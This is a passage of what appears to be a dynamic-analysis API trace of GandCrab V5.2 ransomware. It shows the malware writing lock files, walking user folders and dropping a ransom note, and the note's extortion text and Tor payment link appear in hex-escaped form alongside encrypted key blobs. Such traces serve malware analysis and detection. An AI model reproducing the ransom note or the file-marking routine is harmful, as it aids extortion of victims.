\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0071.801] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0071.802] CloseHandle (hObject=0x2bc) returned 1 [0071.802] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.802] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.802] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x79)) [0071.802] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.803] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.803] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.803] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a09d2ca4deb61a.lock") returned 79 [0071.803] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0071.803] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.803] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.804] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 55 [0071.804] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0071.804] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5033b8 [0071.804] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.804] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.804] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.804] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.804] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.804] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0071.804] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0071.804] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a09d2ca4deb61a.lock" [0071.804] lstrlenW (lpString=".titwmvjl") returned 9 [0071.804] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a09d2ca4deb61a.lock") returned 79 [0071.804] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.804] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0071.804] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a09d2ca4deb61a.lock") returned 79 [0071.804] lstrlenW (lpString=".lock") returned 5 [0071.804] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.805] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0071.805] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.805] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.805] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.805] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0071.805] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0071.805] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0071.805] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0071.805] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.806] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0071.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.806] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0071.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.806] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0071.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.806] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0071.806] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.806] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.807] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\TITWMVJL-DECRYPT.txt") returned 80 [0071.807] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0071.808] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x